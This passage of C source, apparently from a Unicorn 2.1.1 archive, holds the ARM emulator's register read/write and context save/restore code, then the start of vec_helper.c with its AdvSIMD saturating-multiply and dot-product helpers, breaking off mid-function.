uc_struct *uc) { CPUArchState *env; (void)uc; env = uc->cpu->env_ptr; memset(env->regs, 0, sizeof(env->regs)); env->pc = 0; } /* these functions are implemented in helper.c. */ #include "exec/helper-head.h" uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg); void HELPER(v7m_msr)(CPUARMState *env, uint32_t reg, uint32_t val); static uint32_t v7m_mrs_xpsr(CPUARMState *env, uint32_t reg) { uint32_t mask = 0; if (reg & 1) { mask |= XPSR_EXCP; /* IPSR (unpriv. reads as zero) */ } if (!(reg & 4)) { mask |= XPSR_NZCV | XPSR_Q; /* APSR */ if (arm_feature(env, ARM_FEATURE_THUMB_DSP)) { mask |= XPSR_GE; } } if (reg & 2) { mask |= (XPSR_IT_0_1 | XPSR_IT_2_7 | XPSR_T); /* EPSR */ } return xpsr_read(env) & mask; } static void v7m_msr_xpsr(CPUARMState *env, uint32_t mask, uint32_t reg, uint32_t val) { uint32_t xpsrmask = 0; if (reg & 1) { xpsrmask |= XPSR_EXCP; } if (!(reg & 4)) { if (mask & 8) { xpsrmask |= XPSR_NZCV | XPSR_Q; } if ((mask & 4) && arm_feature(env, ARM_FEATURE_THUMB_DSP)) { xpsrmask |= XPSR_GE; } } if (reg & 2) { xpsrmask |= (XPSR_IT_0_1 | XPSR_IT_2_7 | XPSR_T); } xpsr_write(env, val, xpsrmask); } static uc_err read_cp_reg(CPUARMState *env, uc_arm_cp_reg *cp) { ARMCPU *cpu = ARM_CPU(env->uc->cpu); int ns = cp->sec ? 0 : 1; const ARMCPRegInfo *ri = get_arm_cp_reginfo( cpu->cp_regs, ENCODE_CP_REG(cp->cp, cp->is64, ns, cp->crn, cp->crm, cp->opc1, cp->opc2)); if (!ri) { return UC_ERR_ARG; } cp->val = read_raw_cp_reg(env, ri); if (!cp->is64) { cp->val = cp->val & 0xFFFFFFFF; } return UC_ERR_OK; } static uc_err write_cp_reg(CPUARMState *env, uc_arm_cp_reg *cp) { ARMCPU *cpu = ARM_CPU(env->uc->cpu); int ns = cp->sec ? 0 : 1; const ARMCPRegInfo *ri = get_arm_cp_reginfo( cpu->cp_regs, ENCODE_CP_REG(cp->cp, cp->is64, ns, cp->crn, cp->crm, cp->opc1, cp->opc2)); if (!ri) { return UC_ERR_ARG; } if (!cp->is64) { cp->val = cp->val & 0xFFFFFFFF; } if (ri->raw_writefn) { ri->raw_writefn(env, ri, cp->val); } else if (ri->writefn) { ri->writefn(env, ri, cp->val); } else { if (cpreg_field_is_64bit(ri)) { CPREG_FIELD64(env, ri) = cp->val; } else { CPREG_FIELD32(env, ri) = cp->val; } } return UC_ERR_OK; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUARMState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_ARM_REG_R0 && regid <= UC_ARM_REG_R12) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regs[regid - UC_ARM_REG_R0]; } else if (regid >= UC_ARM_REG_Q0 && regid <= UC_ARM_REG_Q15) { CHECK_REG_TYPE(uint64_t[2]); uint32_t reg_index = regid - UC_ARM_REG_Q0; *(uint64_t *)value = env->vfp.zregs[reg_index].d[0]; *(((uint64_t *)value) + 1) = env->vfp.zregs[reg_index].d[1]; } else if (regid >= UC_ARM_REG_D0 && regid <= UC_ARM_REG_D31) { CHECK_REG_TYPE(uint64_t); uint32_t reg_index = regid - UC_ARM_REG_D0; *(uint64_t *)value = env->vfp.zregs[reg_index / 2].d[reg_index & 1]; } else if (regid >= UC_ARM_REG_S0 && regid <= UC_ARM_REG_S31) { CHECK_REG_TYPE(uint32_t); uint32_t reg_index = regid - UC_ARM_REG_S0; uint64_t reg_value = env->vfp.zregs[reg_index / 4].d[reg_index % 4 / 2]; if (reg_index % 2 == 0) { *(uint32_t *)value = (uint32_t)(reg_value & 0xffffffff); } else { *(uint32_t *)value = (uint32_t)(reg_value >> 32); } } else { switch (regid) { case UC_ARM_REG_APSR: if (arm_feature(env, ARM_FEATURE_M)) { CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 0); } else { CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpsr_read(env) & (CPSR_NZCV | CPSR_Q | CPSR_GE); } break; case UC_ARM_REG_APSR_NZCV: CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpsr_read(env) & CPSR_NZCV; break; case UC_ARM_REG_CPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpsr_read(env); break; case UC_ARM_REG_SPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->spsr; break; // case UC_ARM_REG_SP: case UC_ARM_REG_R13: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[13]; break; // case UC_ARM_REG_LR: case UC_ARM_REG_R14: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[14]; break; // case UC_ARM_REG_PC: case UC_ARM_REG_R15: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[15]; break; case UC_ARM_REG_C1_C0_2: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->cp15.cpacr_el1; break; case UC_ARM_REG_C13_C0_3: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->cp15.tpidrro_el[0]; break; case UC_ARM_REG_FPEXC: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->vfp.xregs[ARM_VFP_FPEXC]; break; case UC_ARM_REG_FPSCR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = vfp_get_fpscr(env); break; case UC_ARM_REG_FPSID: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->vfp.xregs[ARM_VFP_FPSID]; break; case UC_ARM_REG_IPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 5); break; case UC_ARM_REG_MSP: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 8); break; case UC_ARM_REG_PSP: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 9); break; case UC_ARM_REG_IAPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 1); break; case UC_ARM_REG_EAPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 2); break; case UC_ARM_REG_XPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 3); break; case UC_ARM_REG_EPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 6); break; case UC_ARM_REG_IEPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 7); break; case UC_ARM_REG_PRIMASK: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 16); break; case UC_ARM_REG_BASEPRI: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 17); break; case UC_ARM_REG_BASEPRI_MAX: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 18); break; case UC_ARM_REG_FAULTMASK: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 19); break; case UC_ARM_REG_CONTROL: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 20); break; case UC_ARM_REG_CP_REG: CHECK_REG_TYPE(uc_arm_cp_reg); ret = read_cp_reg(env, (uc_arm_cp_reg *)value); break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUARMState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_ARM_REG_R0 && regid <= UC_ARM_REG_R12) { CHECK_REG_TYPE(uint32_t); env->regs[regid - UC_ARM_REG_R0] = *(uint32_t *)value; } else if (regid >= UC_ARM_REG_Q0 && regid <= UC_ARM_REG_Q15) { CHECK_REG_TYPE(uint64_t[2]); uint32_t reg_index = regid - UC_ARM_REG_Q0; env->vfp.zregs[reg_index].d[0] = *(uint64_t *)value; env->vfp.zregs[reg_index].d[1] = *(((uint64_t *)value) + 1); } else if (regid >= UC_ARM_REG_D0 && regid <= UC_ARM_REG_D31) { CHECK_REG_TYPE(uint64_t); uint32_t reg_index = regid - UC_ARM_REG_D0; env->vfp.zregs[reg_index / 2].d[reg_index & 1] = *(uint64_t *)value; } else if (regid >= UC_ARM_REG_S0 && regid <= UC_ARM_REG_S31) { CHECK_REG_TYPE(uint32_t); uint32_t reg_index = regid - UC_ARM_REG_S0; uint64_t *p_reg_value = &env->vfp.zregs[reg_index / 4].d[reg_index % 4 / 2]; uint64_t in_value = *((uint32_t *)value); if (reg_index % 2 == 0) { in_value |= *p_reg_value & 0xffffffff00000000ul; } else { in_value = (in_value << 32) | (*p_reg_value & 0xfffffffful); } *p_reg_value = in_value; } else { switch (regid) { case UC_ARM_REG_APSR: CHECK_REG_TYPE(uint32_t); if (!arm_feature(env, ARM_FEATURE_M)) { cpsr_write(env, *(uint32_t *)value, (CPSR_NZCV | CPSR_Q | CPSR_GE), CPSRWriteByUnicorn); arm_rebuild_hflags(env); } else { // Same with UC_ARM_REG_APSR_NZCVQ v7m_msr_xpsr(env, 0b1000, 0, *(uint32_t *)value); } break; case UC_ARM_REG_APSR_NZCV: CHECK_REG_TYPE(uint32_t); cpsr_write(env, *(uint32_t *)value, CPSR_NZCV, CPSRWriteByUnicorn); arm_rebuild_hflags(env); break; case UC_ARM_REG_CPSR: CHECK_REG_TYPE(uint32_t); cpsr_write(env, *(uint32_t *)value, ~0, CPSRWriteByUnicorn); arm_rebuild_hflags(env); break; case UC_ARM_REG_SPSR: CHECK_REG_TYPE(uint32_t); env->spsr = *(uint32_t *)value; break; // case UC_ARM_REG_SP: case UC_ARM_REG_R13: CHECK_REG_TYPE(uint32_t); env->regs[13] = *(uint32_t *)value; break; // case UC_ARM_REG_LR: case UC_ARM_REG_R14: CHECK_REG_TYPE(uint32_t); env->regs[14] = *(uint32_t *)value; break; // case UC_ARM_REG_PC: case UC_ARM_REG_R15: CHECK_REG_TYPE(uint32_t); env->pc = (*(uint32_t *)value & ~1); env->thumb = (*(uint32_t *)value & 1); env->uc->thumb = (*(uint32_t *)value & 1); env->regs[15] = (*(uint32_t *)value & ~1); *setpc = 1; break; // case UC_ARM_REG_C1_C0_2: // env->cp15.c1_coproc = *(int32_t *)value; // break; case UC_ARM_REG_C13_C0_3: CHECK_REG_TYPE(int32_t); env->cp15.tpidrro_el[0] = *(int32_t *)value; break; case UC_ARM_REG_FPEXC: CHECK_REG_TYPE(int32_t); env->vfp.xregs[ARM_VFP_FPEXC] = *(int32_t *)value; break; case UC_ARM_REG_FPSCR: CHECK_REG_TYPE(int32_t); vfp_set_fpscr(env, *(int32_t *)value); break; case UC_ARM_REG_FPSID: CHECK_REG_TYPE(int32_t); env->vfp.xregs[ARM_VFP_FPSID] = *(int32_t *)value; break; case UC_ARM_REG_IPSR: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1000, 5, *(uint32_t *)value); break; case UC_ARM_REG_MSP: CHECK_REG_TYPE(uint32_t); helper_v7m_msr(env, 8, *(uint32_t *)value); break; case UC_ARM_REG_PSP: CHECK_REG_TYPE(uint32_t); helper_v7m_msr(env, 9, *(uint32_t *)value); break; case UC_ARM_REG_CONTROL: CHECK_REG_TYPE(uint32_t); helper_v7m_msr(env, 20, *(uint32_t *)value); break; case UC_ARM_REG_EPSR: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1000, 6, *(uint32_t *)value); break; case UC_ARM_REG_IEPSR: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1000, 7, *(uint32_t *)value); break; case UC_ARM_REG_PRIMASK: CHECK_REG_TYPE(uint32_t); helper_v7m_msr(env, 16, *(uint32_t *)value); break; case UC_ARM_REG_BASEPRI: CHECK_REG_TYPE(uint32_t); helper_v7m_msr(env, 17, *(uint32_t *)value); break; case UC_ARM_REG_BASEPRI_MAX: CHECK_REG_TYPE(uint32_t); helper_v7m_msr(env, 18, *(uint32_t *)value); break; case UC_ARM_REG_FAULTMASK: CHECK_REG_TYPE(uint32_t); helper_v7m_msr(env, 19, *(uint32_t *)value); break; case UC_ARM_REG_APSR_NZCVQ: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1000, 0, *(uint32_t *)value); break; case UC_ARM_REG_APSR_G: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b0100, 0, *(uint32_t *)value); break; case UC_ARM_REG_APSR_NZCVQG: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1100, 0, *(uint32_t *)value); break; case UC_ARM_REG_IAPSR: case UC_ARM_REG_IAPSR_NZCVQ: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1000, 1, *(uint32_t *)value); break; case UC_ARM_REG_IAPSR_G: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b0100, 1, *(uint32_t *)value); break; case UC_ARM_REG_IAPSR_NZCVQG: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1100, 1, *(uint32_t *)value); break; case UC_ARM_REG_EAPSR: case UC_ARM_REG_EAPSR_NZCVQ: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1000, 2, *(uint32_t *)value); break; case UC_ARM_REG_EAPSR_G: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b0100, 2, *(uint32_t *)value); break; case UC_ARM_REG_EAPSR_NZCVQG: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1100, 2, *(uint32_t *)value); break; case UC_ARM_REG_XPSR: case UC_ARM_REG_XPSR_NZCVQ: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1000, 3, *(uint32_t *)value); break; case UC_ARM_REG_XPSR_G: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b0100, 3, *(uint32_t *)value); break; case UC_ARM_REG_XPSR_NZCVQG: CHECK_REG_TYPE(uint32_t); v7m_msr_xpsr(env, 0b1100, 3, *(uint32_t *)value); break; case UC_ARM_REG_CP_REG: CHECK_REG_TYPE(uc_arm_cp_reg); ret = write_cp_reg(env, (uc_arm_cp_reg *)value); arm_rebuild_hflags_arm(env); break; } } return ret; } static bool arm_stop_interrupt(struct uc_struct *uc, int intno) { switch (intno) { default: return false; case EXCP_UDEF: case EXCP_YIELD: return true; case EXCP_INVSTATE: uc->invalid_error = UC_ERR_EXCEPTION; return true; } } static uc_err arm_query(struct uc_struct *uc, uc_query_type type, size_t *result) { CPUState *mycpu = uc->cpu; uint32_t mode; switch (type) { case UC_QUERY_MODE: // zero out ARM/THUMB mode mode = uc->mode & ~(UC_MODE_ARM | UC_MODE_THUMB); // THUMB mode or ARM MOde mode |= ((ARM_CPU(mycpu)->env.thumb != 0) ? UC_MODE_THUMB : UC_MODE_ARM); *result = mode; return UC_ERR_OK; default: return UC_ERR_ARG; } } static bool arm_opcode_hook_invalidate(uint32_t op, uint32_t flags) { if (op != UC_TCG_OP_SUB) { return false; } if (flags == UC_TCG_OP_FLAG_CMP && op != UC_TCG_OP_SUB) { return false; } return true; } static int arm_cpus_init(struct uc_struct *uc, const char *cpu_model) { ARMCPU *cpu; cpu = cpu_arm_init(uc); if (cpu == NULL) { return -1; } return 0; } static size_t uc_arm_context_size(struct uc_struct *uc) { size_t ret = offsetof(CPUARMState, cpu_watchpoint); ARMCPU *cpu = (ARMCPU *)uc->cpu; CPUARMState *env = (CPUARMState *)&cpu->env; uint32_t nr; #define ARM_ENV_CHECK(field) \ if (field) { \ ret += sizeof(uint32_t) * (nr + 1); \ } else { \ ret += sizeof(uint32_t); \ } // /* PMSAv7 MPU */ // struct { // uint32_t *drbar; // uint32_t *drsr; // uint32_t *dracr; // uint32_t rnr[M_REG_NUM_BANKS]; // } pmsav7; // /* PMSAv8 MPU */ // struct { // /* The PMSAv8 implementation also shares some PMSAv7 config // * and state: // * pmsav7.rnr (region number register) // * pmsav7_dregion (number of configured regions) // */ // uint32_t *rbar[M_REG_NUM_BANKS]; // uint32_t *rlar[M_REG_NUM_BANKS]; // uint32_t mair0[M_REG_NUM_BANKS]; // uint32_t mair1[M_REG_NUM_BANKS]; // } pmsav8; nr = cpu->pmsav7_dregion; ARM_ENV_CHECK(env->pmsav7.drbar) ARM_ENV_CHECK(env->pmsav7.drsr) ARM_ENV_CHECK(env->pmsav7.dracr) ARM_ENV_CHECK(env->pmsav8.rbar[M_REG_NS]) ARM_ENV_CHECK(env->pmsav8.rbar[M_REG_S]) ARM_ENV_CHECK(env->pmsav8.rlar[M_REG_NS]) ARM_ENV_CHECK(env->pmsav8.rlar[M_REG_S]) // /* v8M SAU */ // struct { // uint32_t *rbar; // uint32_t *rlar; // uint32_t rnr; // uint32_t ctrl; // } sau; nr = cpu->sau_sregion; ARM_ENV_CHECK(env->sau.rbar) ARM_ENV_CHECK(env->sau.rlar) #undef ARM_ENV_CHECK // These fields are never used: // void *nvic; // const struct arm_boot_info *boot_info; // void *gicv3state; return ret; } static uc_err uc_arm_context_save(struct uc_struct *uc, uc_context *context) { char *p = NULL; ARMCPU *cpu = (ARMCPU *)uc->cpu; CPUARMState *env = (CPUARMState *)&cpu->env; uint32_t nr = 0; #define ARM_ENV_SAVE(field) \ if (!field) { \ *(uint32_t *)p = 0; \ p += sizeof(uint32_t); \ } else { \ *(uint32_t *)p = nr; \ p += sizeof(uint32_t); \ memcpy(p, (void *)field, sizeof(uint32_t) * nr); \ p += sizeof(uint32_t) * nr; \ } p = context->data; memcpy(p, uc->cpu->env_ptr, uc->cpu_context_size); p += uc->cpu_context_size; nr = cpu->pmsav7_dregion; ARM_ENV_SAVE(env->pmsav7.drbar) ARM_ENV_SAVE(env->pmsav7.drsr) ARM_ENV_SAVE(env->pmsav7.dracr) ARM_ENV_SAVE(env->pmsav8.rbar[M_REG_NS]) ARM_ENV_SAVE(env->pmsav8.rbar[M_REG_S]) ARM_ENV_SAVE(env->pmsav8.rlar[M_REG_NS]) ARM_ENV_SAVE(env->pmsav8.rlar[M_REG_S]) nr = cpu->sau_sregion; ARM_ENV_SAVE(env->sau.rbar) ARM_ENV_SAVE(env->sau.rlar) #undef ARM_ENV_SAVE return UC_ERR_OK; } static uc_err uc_arm_context_restore(struct uc_struct *uc, uc_context *context) { char *p = NULL; ARMCPU *cpu = (ARMCPU *)uc->cpu; CPUARMState *env = (CPUARMState *)&cpu->env; uint32_t nr, ctx_nr; #define ARM_ENV_RESTORE(field) \ ctx_nr = *(uint32_t *)p; \ if (ctx_nr != 0) { \ p += sizeof(uint32_t); \ if (field && ctx_nr == nr) { \ memcpy(field, p, sizeof(uint32_t) * ctx_nr); \ } \ p += sizeof(uint32_t) * ctx_nr; \ } else { \ p += sizeof(uint32_t); \ } p = context->data; memcpy(uc->cpu->env_ptr, p, uc->cpu_context_size); p += uc->cpu_context_size; nr = cpu->pmsav7_dregion; ARM_ENV_RESTORE(env->pmsav7.drbar) ARM_ENV_RESTORE(env->pmsav7.drsr) ARM_ENV_RESTORE(env->pmsav7.dracr) ARM_ENV_RESTORE(env->pmsav8.rbar[M_REG_NS]) ARM_ENV_RESTORE(env->pmsav8.rbar[M_REG_S]) ARM_ENV_RESTORE(env->pmsav8.rlar[M_REG_NS]) ARM_ENV_RESTORE(env->pmsav8.rlar[M_REG_S]) nr = cpu->sau_sregion; ARM_ENV_RESTORE(env->sau.rbar) ARM_ENV_RESTORE(env->sau.rlar) #undef ARM_ENV_RESTORE return UC_ERR_OK; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = arm_set_pc; uc->get_pc = arm_get_pc; uc->stop_interrupt = arm_stop_interrupt; uc->release = arm_release; uc->query = arm_query; uc->cpus_init = arm_cpus_init; uc->opcode_hook_invalidate = arm_opcode_hook_invalidate; uc->cpu_context_size = offsetof(CPUARMState, cpu_watchpoint); uc->context_size = uc_arm_context_size; uc->context_save = uc_arm_context_save; uc->context_restore = uc_arm_context_restore; uc_common_init(uc); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/vec_helper.c����������������������������������������������������������0000664�0000000�0000000�00000117573�14675241067�0020516�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM AdvSIMD / SVE Vector Operations * * Copyright (c) 2018 Linaro * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "tcg/tcg-gvec-desc.h" #include "fpu/softfloat.h" /* Note that vector data is stored in host-endian 64-bit chunks, so addressing units smaller than that needs a host-endian fixup. */ #ifdef HOST_WORDS_BIGENDIAN #define H1(x) ((x) ^ 7) #define H2(x) ((x) ^ 3) #define H4(x) ((x) ^ 1) #else #define H1(x) (x) #define H2(x) (x) #define H4(x) (x) #endif #define SET_QC() env->vfp.qc[0] = 1 static void clear_tail(void *vd, uintptr_t opr_sz, uintptr_t max_sz) { uint64_t *d = (uint64_t *)((char *)vd + opr_sz); uintptr_t i; for (i = opr_sz; i < max_sz; i += 8) { *d++ = 0; } } /* Signed saturating rounding doubling multiply-accumulate high half, 16-bit */ static uint16_t inl_qrdmlah_s16(CPUARMState *env, int16_t src1, int16_t src2, int16_t src3) { /* Simplify: * = ((a3 << 16) + ((e1 * e2) << 1) + (1 << 15)) >> 16 * = ((a3 << 15) + (e1 * e2) + (1 << 14)) >> 15 */ int32_t ret = (int32_t)src1 * src2; ret = ((int32_t)src3 << 15) + ret + (1 << 14); ret >>= 15; if (ret != (int16_t)ret) { SET_QC(); ret = (ret < 0 ? -0x8000 : 0x7fff); } return ret; } uint32_t HELPER(neon_qrdmlah_s16)(CPUARMState *env, uint32_t src1, uint32_t src2, uint32_t src3) { uint16_t e1 = inl_qrdmlah_s16(env, src1, src2, src3); uint16_t e2 = inl_qrdmlah_s16(env, src1 >> 16, src2 >> 16, src3 >> 16); return deposit32(e1, 16, 16, e2); } void HELPER(gvec_qrdmlah_s16)(void *vd, void *vn, void *vm, void *ve, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); int16_t *d = vd; int16_t *n = vn; int16_t *m = vm; CPUARMState *env = ve; uintptr_t i; for (i = 0; i < opr_sz / 2; ++i) { d[i] = inl_qrdmlah_s16(env, n[i], m[i], d[i]); } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* Signed saturating rounding doubling multiply-subtract high half, 16-bit */ static uint16_t inl_qrdmlsh_s16(CPUARMState *env, int16_t src1, int16_t src2, int16_t src3) { /* Similarly, using subtraction: * = ((a3 << 16) - ((e1 * e2) << 1) + (1 << 15)) >> 16 * = ((a3 << 15) - (e1 * e2) + (1 << 14)) >> 15 */ int32_t ret = (int32_t)src1 * src2; ret = ((int32_t)src3 << 15) - ret + (1 << 14); ret >>= 15; if (ret != (int16_t)ret) { SET_QC(); ret = (ret < 0 ? -0x8000 : 0x7fff); } return ret; } uint32_t HELPER(neon_qrdmlsh_s16)(CPUARMState *env, uint32_t src1, uint32_t src2, uint32_t src3) { uint16_t e1 = inl_qrdmlsh_s16(env, src1, src2, src3); uint16_t e2 = inl_qrdmlsh_s16(env, src1 >> 16, src2 >> 16, src3 >> 16); return deposit32(e1, 16, 16, e2); } void HELPER(gvec_qrdmlsh_s16)(void *vd, void *vn, void *vm, void *ve, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); int16_t *d = vd; int16_t *n = vn; int16_t *m = vm; CPUARMState *env = ve; uintptr_t i; for (i = 0; i < opr_sz / 2; ++i) { d[i] = inl_qrdmlsh_s16(env, n[i], m[i], d[i]); } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* Signed saturating rounding doubling multiply-accumulate high half, 32-bit */ uint32_t HELPER(neon_qrdmlah_s32)(CPUARMState *env, int32_t src1, int32_t src2, int32_t src3) { /* Simplify similarly to int_qrdmlah_s16 above. */ int64_t ret = (int64_t)src1 * src2; ret = ((int64_t)src3 << 31) + ret + (1 << 30); ret >>= 31; if (ret != (int32_t)ret) { SET_QC(); ret = (ret < 0 ? INT32_MIN : INT32_MAX); } return ret; } void HELPER(gvec_qrdmlah_s32)(void *vd, void *vn, void *vm, void *ve, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); int32_t *d = vd; int32_t *n = vn; int32_t *m = vm; CPUARMState *env = ve; uintptr_t i; for (i = 0; i < opr_sz / 4; ++i) { d[i] = helper_neon_qrdmlah_s32(env, n[i], m[i], d[i]); } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* Signed saturating rounding doubling multiply-subtract high half, 32-bit */ uint32_t HELPER(neon_qrdmlsh_s32)(CPUARMState *env, int32_t src1, int32_t src2, int32_t src3) { /* Simplify similarly to int_qrdmlsh_s16 above. */ int64_t ret = (int64_t)src1 * src2; ret = ((int64_t)src3 << 31) - ret + (1 << 30); ret >>= 31; if (ret != (int32_t)ret) { SET_QC(); ret = (ret < 0 ? INT32_MIN : INT32_MAX); } return ret; } void HELPER(gvec_qrdmlsh_s32)(void *vd, void *vn, void *vm, void *ve, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); int32_t *d = vd; int32_t *n = vn; int32_t *m = vm; CPUARMState *env = ve; uintptr_t i; for (i = 0; i < opr_sz / 4; ++i) { d[i] = helper_neon_qrdmlsh_s32(env, n[i], m[i], d[i]); } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* Integer 8 and 16-bit dot-product. * * Note that for the loops herein, host endianness does not matter * with respect to the ordering of data within the 64-bit lanes. * All elements are treated equally, no matter where they are. */ void HELPER(gvec_sdot_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint32_t *d = vd; int8_t *n = vn, *m = vm; for (i = 0; i < opr_sz / 4; ++i) { d[i] += n[i * 4 + 0] * m[i * 4 + 0] + n[i * 4 + 1] * m[i * 4 + 1] + n[i * 4 + 2] * m[i * 4 + 2] + n[i * 4 + 3] * m[i * 4 + 3]; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_udot_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint32_t *d = vd; uint8_t *n = vn, *m = vm; for (i = 0; i < opr_sz / 4; ++i) { d[i] += n[i * 4 + 0] * m[i * 4 + 0] + n[i * 4 + 1] * m[i * 4 + 1] + n[i * 4 + 2] * m[i * 4 + 2] + n[i * 4 + 3] * m[i * 4 + 3]; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_sdot_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint64_t *d = vd; int16_t *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; ++i) { d[i] += (int64_t)n[i * 4 + 0] * m[i * 4 + 0] + (int64_t)n[i * 4 + 1] * m[i * 4 + 1] + (int64_t)n[i * 4 + 2] * m[i * 4 + 2] + (int64_t)n[i * 4 + 3] * m[i * 4 + 3]; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_udot_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint64_t *d = vd; uint16_t *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; ++i) { d[i] += (uint64_t)n[i * 4 + 0] * m[i * 4 + 0] + (uint64_t)n[i * 4 + 1] * m[i * 4 + 1] + (uint64_t)n[i * 4 + 2] * m[i * 4 + 2] + (uint64_t)n[i * 4 + 3] * m[i * 4 + 3]; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_sdot_idx_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, segend, opr_sz = simd_oprsz(desc), opr_sz_4 = opr_sz / 4; intptr_t index = simd_data(desc); uint32_t *d = vd; int8_t *n = vn; int8_t *m_indexed = (int8_t *)vm + index * 4; /* Notice the special case of opr_sz == 8, from aa64/aa32 advsimd. * Otherwise opr_sz is a multiple of 16. */ segend = MIN(4, opr_sz_4); i = 0; do { int8_t m0 = m_indexed[i * 4 + 0]; int8_t m1 = m_indexed[i * 4 + 1]; int8_t m2 = m_indexed[i * 4 + 2]; int8_t m3 = m_indexed[i * 4 + 3]; do { d[i] += n[i * 4 + 0] * m0 + n[i * 4 + 1] * m1 + n[i * 4 + 2] * m2 + n[i * 4 + 3] * m3; } while (++i < segend); segend = i + 4; } while (i < opr_sz_4); clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_udot_idx_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, segend, opr_sz = simd_oprsz(desc), opr_sz_4 = opr_sz / 4; intptr_t index = simd_data(desc); uint32_t *d = vd; uint8_t *n = vn; uint8_t *m_indexed = (uint8_t *)vm + index * 4; /* Notice the special case of opr_sz == 8, from aa64/aa32 advsimd. * Otherwise opr_sz is a multiple of 16. */ segend = MIN(4, opr_sz_4); i = 0; do { uint8_t m0 